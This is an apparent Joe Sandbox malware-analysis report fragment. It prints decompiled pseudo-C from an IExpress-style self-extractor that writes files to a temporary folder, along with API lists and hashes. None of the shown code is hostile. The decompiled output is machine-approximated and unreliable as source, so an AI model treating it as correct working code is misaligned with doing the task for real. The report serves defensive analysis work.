                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 002F6502
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$AttributesFile
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                • API String ID: 438848745-1736355793
                                                • Opcode ID: f264c575c18e3bddfc4b027f3cc6e995aca0bc160b570f50a79bb0f37aa683ca
                                                • Instruction ID: 77d371ae0fe9dfdde23c497b10b6416402ac42402a5fef3b01c5ad6c30189969
                                                • Opcode Fuzzy Hash: f264c575c18e3bddfc4b027f3cc6e995aca0bc160b570f50a79bb0f37aa683ca
                                                • Instruction Fuzzy Hash: 0D01A77051010DABDB109B64EC4DFFAF778DB50760F900179F689A21C0DF709DA5CA51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 32%
                                                			E002F4169(void* __eflags) {
                                                				int _t18;
                                                				void* _t21;
                                                
                                                				_t20 = E002F468F("FINISHMSG", 0, 0);
                                                				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                				if(_t21 != 0) {
                                                					if(E002F468F("FINISHMSG", _t21, _t20) != 0) {
                                                						if(lstrcmpA(_t21, "<None>") == 0) {
                                                							L7:
                                                							return LocalFree(_t21);
                                                						}
                                                						_push(0);
                                                						_push(0x40);
                                                						_push(0);
                                                						_push(_t21);
                                                						_t18 = 0x3e9;
                                                						L6:
                                                						E002F44B9(0, _t18);
                                                						goto L7;
                                                					}
                                                					_push(0);
                                                					_push(0x10);
                                                					_push(0);
                                                					_push(0);
                                                					_t18 = 0x4b1;
                                                					goto L6;
                                                				}
                                                				return E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                			}





                                                0x002f417d
                                                0x002f418f
                                                0x002f4193
                                                0x002f41b7
                                                0x002f41d3
                                                0x002f41e6
                                                0x00000000
                                                0x002f41e7
                                                0x002f41d5
                                                0x002f41d6
                                                0x002f41d8
                                                0x002f41d9
                                                0x002f41da
                                                0x002f41df
                                                0x002f41e1
                                                0x00000000
                                                0x002f41e1
                                                0x002f41b9
                                                0x002f41ba
                                                0x002f41bc
                                                0x002f41bd
                                                0x002f41be
                                                0x00000000
                                                0x002f41be
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
                                                  • Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
                                                  • Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
                                                  • Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
                                                  • Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
                                                  • Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF
                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,002F30B4), ref: 002F4189
                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,002F30B4), ref: 002F41E7
                                                  • Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                  • Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                • String ID: <None>$FINISHMSG
                                                • API String ID: 3507850446-3091758298
                                                • Opcode ID: f391a13c1754173302f234d6bb23ed212e470d9072328ca05dceb303b346c8f0
                                                • Instruction ID: 16feb64697b07e6ee4c3c28e78b54cd9c2296f07b7a1e26fc6f85ad3315c0fad
                                                • Opcode Fuzzy Hash: f391a13c1754173302f234d6bb23ed212e470d9072328ca05dceb303b346c8f0
                                                • Instruction Fuzzy Hash: F301A2B572021C7BF3243A655C85F7B918DDB957D5F004035B70AE11809EE8DC214575
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F7155() {
                                                				void* _v8;
                                                				struct _FILETIME _v16;
                                                				signed int _v20;
                                                				union _LARGE_INTEGER _v24;
                                                				signed int _t23;
                                                				signed int _t36;
                                                				signed int _t37;
                                                				signed int _t39;
                                                
                                                				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                				_t23 =  *0x2f8004; // 0x404cc811
                                                				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                					GetSystemTimeAsFileTime( &_v16);
                                                					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                					_v8 = _v8 ^ GetCurrentProcessId();
                                                					_v8 = _v8 ^ GetCurrentThreadId();
                                                					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                					QueryPerformanceCounter( &_v24);
                                                					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                					_t39 = _t36;
                                                					if(_t36 == 0xbb40e64e || ( *0x2f8004 & 0xffff0000) == 0) {
                                                						_t36 = 0xbb40e64f;
                                                						_t39 = 0xbb40e64f;
                                                					}
                                                					 *0x2f8004 = _t39;
                                                				}
                                                				_t37 =  !_t36;
                                                				 *0x2f8008 = _t37;
                                                				return _t37;
                                                			}











                                                0x002f715d
                                                0x002f7161
                                                0x002f7165
                                                0x002f7178
                                                0x002f7182
                                                0x002f718e
                                                0x002f7197
                                                0x002f71a0
                                                0x002f71b1
                                                0x002f71b8
                                                0x002f71c4
                                                0x002f71c7
                                                0x002f71cb
                                                0x002f71d5
                                                0x002f71da
                                                0x002f71da
                                                0x002f71dc
                                                0x002f71dc
                                                0x002f71e2
                                                0x002f71e5
                                                0x002f71ee

                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 002F7182
                                                • GetCurrentProcessId.KERNEL32 ref: 002F7191
                                                • GetCurrentThreadId.KERNEL32 ref: 002F719A
                                                • GetTickCount.KERNEL32 ref: 002F71A3
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 002F71B8
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                • String ID:
                                                • API String ID: 1445889803-0
                                                • Opcode ID: 1351c7f8d77e79639a957ccb55f1a3a24988525161f3b049d9b6c07ac66b6bae
                                                • Instruction ID: 98aaec9db3830014d6f48058827663c083f437985fdda28c447c78c4de84cf3f
                                                • Opcode Fuzzy Hash: 1351c7f8d77e79639a957ccb55f1a3a24988525161f3b049d9b6c07ac66b6bae
                                                • Instruction Fuzzy Hash: 1E110D71D15208DBCB10DFB8EA4CAAFF7F4EF48365F914469D909D7210DA349A14CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E002F19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                				signed int _v8;
                                                				char _v520;
                                                				void* __esi;
                                                				signed int _t11;
                                                				void* _t14;
                                                				void* _t23;
                                                				void* _t27;
                                                				void* _t33;
                                                				struct HWND__* _t34;
                                                				signed int _t35;
                                                
                                                				_t33 = __edi;
                                                				_t27 = __ebx;
                                                				_t11 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t11 ^ _t35;
                                                				_t34 = _a4;
                                                				_t14 = _a8 - 0x110;
                                                				if(_t14 == 0) {
                                                					_t32 = GetDesktopWindow();
                                                					E002F43D0(_t34, _t15);
                                                					_v520 = 0;
                                                					LoadStringA( *0x2f9a3c, _a16,  &_v520, 0x200);
                                                					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                					MessageBeep(0xffffffff);
                                                					goto L6;
                                                				} else {
                                                					if(_t14 != 1) {
                                                						L4:
                                                						_t23 = 0;
                                                					} else {
                                                						_t32 = _a12;
                                                						if(_t32 - 0x83d > 1) {
                                                							goto L4;
                                                						} else {
                                                							EndDialog(_t34, _t32);
                                                							L6:
                                                							_t23 = 1;
                                                						}
                                                					}
                                                				}
                                                				return E002F6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                			}













                                                0x002f19e0
                                                0x002f19e0
                                                0x002f19eb
                                                0x002f19f2
                                                0x002f19f9
                                                0x002f19fc
                                                0x002f1a01
                                                0x002f1a2a
                                                0x002f1a2e
                                                0x002f1a3e
                                                0x002f1a4f
                                                0x002f1a62
                                                0x002f1a6a
                                                0x00000000
                                                0x002f1a03
                                                0x002f1a06
                                                0x002f1a20
                                                0x002f1a20
                                                0x002f1a08
                                                0x002f1a08
                                                0x002f1a14
                                                0x00000000
                                                0x002f1a16
                                                0x002f1a18
                                                0x002f1a70
                                                0x002f1a72
                                                0x002f1a72
                                                0x002f1a14
                                                0x002f1a06
                                                0x002f1a81

                                                APIs
                                                • EndDialog.USER32(?,?), ref: 002F1A18
                                                • GetDesktopWindow.USER32 ref: 002F1A24
                                                • LoadStringA.USER32(?,?,00000200), ref: 002F1A4F
                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 002F1A62
                                                • MessageBeep.USER32(000000FF), ref: 002F1A6A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                • String ID:
                                                • API String ID: 1273765764-0
                                                • Opcode ID: 9d6717db8be63dd5523b90d1a379ebcf3204d3fde09bf96319d690339ba746e7
                                                • Instruction ID: fbf9875b0367e6b504e2b02ebe975c393bbcfd063959f22beb0ecc4318286b75
                                                • Opcode Fuzzy Hash: 9d6717db8be63dd5523b90d1a379ebcf3204d3fde09bf96319d690339ba746e7
                                                • Instruction Fuzzy Hash: 3111C27151010D9BCB00EF64ED0CABEB7B8EF09390F504174F61A92190CA70AE21CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E002F63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                				signed int _v8;
                                                				char _v268;
                                                				long _v272;
                                                				void* _v276;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t15;
                                                				long _t28;
                                                				struct _OVERLAPPED* _t37;
                                                				void* _t39;
                                                				signed int _t40;
                                                
                                                				_t15 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t15 ^ _t40;
                                                				_v272 = _v272 & 0x00000000;
                                                				_push(__ecx);
                                                				_v276 = _a16;
                                                				_t37 = 1;
                                                				E002F1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                				E002F658A( &_v268, 0x104, _a12);
                                                				_t28 = 0;
                                                				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                				if(_t39 != 0xffffffff) {
                                                					_t28 = _a4;
                                                					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                						 *0x2f9124 = 0x80070052;
                                                						_t37 = 0;
                                                					}
                                                					CloseHandle(_t39);
                                                				} else {
                                                					 *0x2f9124 = 0x80070052;
                                                					_t37 = 0;
                                                				}
                                                				return E002F6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                			}















                                                0x002f63cb
                                                0x002f63d2
                                                0x002f63d8
                                                0x002f63ea
                                                0x002f63f3
                                                0x002f6401
                                                0x002f6402
                                                0x002f6410
                                                0x002f6415
                                                0x002f6433
                                                0x002f6438
                                                0x002f6449
                                                0x002f6463
                                                0x002f646d
                                                0x002f6477
                                                0x002f6477
                                                0x002f647a
                                                0x002f643a
                                                0x002f643a
                                                0x002f6444
                                                0x002f6444
                                                0x002f6492

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F642D
                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F645B
                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F647A
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F63EB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                • API String ID: 1065093856-3249786385
                                                • Opcode ID: 027030dc8f4ef8f56dfcaa6acc3d3b5c91e69db031e677c8fcb6635b130cffa7
                                                • Instruction ID: 3fe9fb738710593e4eb9d1ab77dace0bc7ba19142b71f57351932f30463b0b01
                                                • Opcode Fuzzy Hash: 027030dc8f4ef8f56dfcaa6acc3d3b5c91e69db031e677c8fcb6635b130cffa7
                                                • Instruction Fuzzy Hash: 1F21C671A1011DABD720DF65EC89FFBB368EB453A4F104179E689A3180DAB06D94CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F47E0(intOrPtr* __ecx) {
                                                				intOrPtr _t6;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t19;
                                                				intOrPtr* _t22;
                                                				void _t24;
                                                				struct HWND__* _t25;
                                                				struct HWND__* _t26;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                				intOrPtr* _t33;
                                                				void* _t34;
                                                
                                                				_t33 = __ecx;
                                                				_t34 = LocalAlloc(0x40, 8);
                                                				if(_t34 != 0) {
                                                					_t22 = _t33;
                                                					_t27 = _t22 + 1;
                                                					do {
                                                						_t6 =  *_t22;
                                                						_t22 = _t22 + 1;
                                                					} while (_t6 != 0);
                                                					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                					 *_t34 = _t24;
                                                					if(_t24 != 0) {
                                                						_t28 = _t33;
                                                						_t19 = _t28 + 1;
                                                						do {
                                                							_t9 =  *_t28;
                                                							_t28 = _t28 + 1;
                                                						} while (_t9 != 0);
                                                						E002F1680(_t24, _t28 - _t19 + 1, _t33);
                                                						_t11 =  *0x2f91e0; // 0x2bc7b60
                                                						 *(_t34 + 4) = _t11;
                                                						 *0x2f91e0 = _t34;
                                                						return 1;
                                                					}
                                                					_t25 =  *0x2f8584; // 0x0
                                                					E002F44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                					LocalFree(_t34);
                                                					L2:
                                                					return 0;
                                                				}
                                                				_t26 =  *0x2f8584; // 0x0
                                                				E002F44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                				goto L2;
                                                			}















                                                0x002f47e8
                                                0x002f47f0
                                                0x002f47f4
                                                0x002f480f
                                                0x002f4811
                                                0x002f4814
                                                0x002f4814
                                                0x002f4816
                                                0x002f4817
                                                0x002f4829
                                                0x002f482b
                                                0x002f482f
                                                0x002f484f
                                                0x002f4852
                                                0x002f4855
                                                0x002f4855
                                                0x002f4857
                                                0x002f4858
                                                0x002f4860
                                                0x002f4865
                                                0x002f486a
                                                0x002f486f
                                                0x00000000
                                                0x002f4876
                                                0x002f4831
                                                0x002f4841
                                                0x002f4847
                                                0x002f480b
                                                0x00000000
                                                0x002f480b
                                                0x002f47f6
                                                0x002f4806
                                                0x00000000

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,002F4E6F), ref: 002F47EA
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 002F4823
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 002F4847
                                                  • Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                  • Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F4851
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                • API String ID: 359063898-3249786385
                                                • Opcode ID: d3e0ad0d23ffd4ceaeeaa666982dc0dffe5d74696569ac6c7625d029bfb7efd8
                                                • Instruction ID: ec8c6f72fb40adbc9cfbefe8177ea4ddc94b23dde0fa89c577da95b67ec283e1
                                                • Opcode Fuzzy Hash: d3e0ad0d23ffd4ceaeeaa666982dc0dffe5d74696569ac6c7625d029bfb7efd8
                                                • Instruction Fuzzy Hash: F91136B82146066FE714AF24AC0CF73BB5AEB813E0B048538EB46D7340DAB59C12CA20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F3680(void* __ecx) {
                                                				void* _v8;
                                                				struct tagMSG _v36;
                                                				int _t8;
                                                				struct HWND__* _t16;
                                                
                                                				_v8 = __ecx;
                                                				_t16 = 0;
                                                				while(1) {
                                                					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                					if(_t8 == 0) {
                                                						break;
                                                					}
                                                					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                						continue;
                                                					} else {
                                                						do {
                                                							if(_v36.message != 0x12) {
                                                								DispatchMessageA( &_v36);
                                                							} else {
                                                								_t16 = 1;
                                                							}
                                                							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                						} while (_t8 != 0);
                                                						if(_t16 == 0) {
                                                							continue;
                                                						}
                                                					}
                                                					break;
                                                				}
                                                				return _t8;
                                                			}







                                                0x002f368c
                                                0x002f368f
                                                0x002f3691
                                                0x002f369f
                                                0x002f36a7
                                                0x00000000
                                                0x00000000
                                                0x002f36ba
                                                0x00000000
                                                0x002f36bc
                                                0x002f36bc
                                                0x002f36c0
                                                0x002f36cb
                                                0x002f36c2
                                                0x002f36c4
                                                0x002f36c4
                                                0x002f36da
                                                0x002f36e0
                                                0x002f36e6
                                                0x00000000
                                                0x00000000
                                                0x002f36e6
                                                0x00000000
                                                0x002f36ba
                                                0x002f36ed

                                                APIs
                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 002F369F
                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002F36B2
                                                • DispatchMessageA.USER32(?), ref: 002F36CB
                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002F36DA
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                • String ID:
                                                • API String ID: 2776232527-0
                                                • Opcode ID: 2baeb8d99d8a05bf946c2581984ff960a80886ea6af05976fae303d9148fe307
                                                • Instruction ID: 54499a6accb4020d47292eb23693384c0da0ab070555a13a605f9fd14104f43b
                                                • Opcode Fuzzy Hash: 2baeb8d99d8a05bf946c2581984ff960a80886ea6af05976fae303d9148fe307
                                                • Instruction Fuzzy Hash: 6C01A77291021977DB308BA66C4CEFFB67CEBC5BA0F000139FA09E2180D560C650C664
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E002F65E8(char* __ecx) {
                                                				char _t3;
                                                				char _t10;
                                                				char* _t12;
                                                				char* _t14;
                                                				char* _t15;
                                                				CHAR* _t16;
                                                
                                                				_t12 = __ecx;
                                                				_t15 = __ecx;
                                                				_t14 =  &(__ecx[1]);
                                                				_t10 = 0;
                                                				do {
                                                					_t3 =  *_t12;
                                                					_t12 =  &(_t12[1]);
                                                				} while (_t3 != 0);
                                                				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                				while(1) {
                                                					_t16 = CharPrevA(_t15, ??);
                                                					if(_t16 <= _t15) {
                                                						break;
                                                					}
                                                					if( *_t16 == 0x5c) {
                                                						L7:
                                                						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                							_t16 = CharNextA(_t16);
                                                						}
                                                						 *_t16 = _t10;
                                                						_t10 = 1;
                                                					} else {
                                                						_push(_t16);
                                                						continue;
                                                					}
                                                					L11:
                                                					return _t10;
                                                				}
                                                				if( *_t16 == 0x5c) {
                                                					goto L7;
                                                				}
                                                				goto L11;
                                                			}









                                                0x002f65e8
                                                0x002f65ed
                                                0x002f65ef
                                                0x002f65f2
                                                0x002f65f4
                                                0x002f65f4
                                                0x002f65f6
                                                0x002f65f7
                                                0x002f6608
                                                0x002f6611
                                                0x002f6618
                                                0x002f661c
                                                0x00000000
                                                0x00000000
                                                0x002f660e
                                                0x002f6623
                                                0x002f6625
                                                0x002f663b
                                                0x002f663b
                                                0x002f663d
                                                0x002f6641
                                                0x002f6610
                                                0x002f6610
                                                0x00000000
                                                0x002f6610
                                                0x002f6644
                                                0x002f6647
                                                0x002f6647
                                                0x002f6621
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,002F2B33), ref: 002F6602
                                                • CharPrevA.USER32(?,00000000), ref: 002F6612
                                                • CharPrevA.USER32(?,00000000), ref: 002F6629
                                                • CharNextA.USER32(00000000), ref: 002F6635
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Char$Prev$Next
                                                • String ID:
                                                • API String ID: 3260447230-0
                                                • Opcode ID: 5cc911c3182cf2d887b6fa39b697dfb1de5a65a22673f92f7ea65a629b4bece7
                                                • Instruction ID: 4acebb642a687f019e7216b6b0030b773cfa50a9d3ebb032ce678763a4fefcf2
                                                • Opcode Fuzzy Hash: 5cc911c3182cf2d887b6fa39b697dfb1de5a65a22673f92f7ea65a629b4bece7
                                                • Instruction Fuzzy Hash: ECF0F9714141566EE7321F285CCC8B7FF9CCB872E4B1A01BFE599D2101D6590D16C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F69B0() {
                                                				intOrPtr* _t4;
                                                				intOrPtr* _t5;
                                                				void* _t6;
                                                				intOrPtr _t11;
                                                				intOrPtr _t12;
                                                
                                                				 *0x2f81f8 = E002F6C70();
                                                				__set_app_type(E002F6FBE(2));
                                                				 *0x2f88a4 =  *0x2f88a4 | 0xffffffff;
                                                				 *0x2f88a8 =  *0x2f88a8 | 0xffffffff;
                                                				_t4 = __p__fmode();
                                                				_t11 =  *0x2f8528; // 0x0
                                                				 *_t4 = _t11;
                                                				_t5 = __p__commode();
                                                				_t12 =  *0x2f851c; // 0x0
                                                				 *_t5 = _t12;
                                                				_t6 = E002F7000();
                                                				if( *0x2f8000 == 0) {
                                                					__setusermatherr(E002F7000);
                                                				}
                                                				E002F71EF(_t6);
                                                				return 0;
                                                			}








                                                0x002f69b7
                                                0x002f69c2
                                                0x002f69c8
                                                0x002f69cf
                                                0x002f69d8
                                                0x002f69de
                                                0x002f69e4
                                                0x002f69e6
                                                0x002f69ec
                                                0x002f69f2
                                                0x002f69f4
                                                0x002f6a00
                                                0x002f6a07
                                                0x002f6a0d
                                                0x002f6a0e
                                                0x002f6a15

                                                APIs
                                                  • Part of subcall function 002F6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 002F6FC5
                                                • __set_app_type.MSVCRT ref: 002F69C2
                                                • __p__fmode.MSVCRT ref: 002F69D8
                                                • __p__commode.MSVCRT ref: 002F69E6
                                                • __setusermatherr.MSVCRT ref: 002F6A07
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
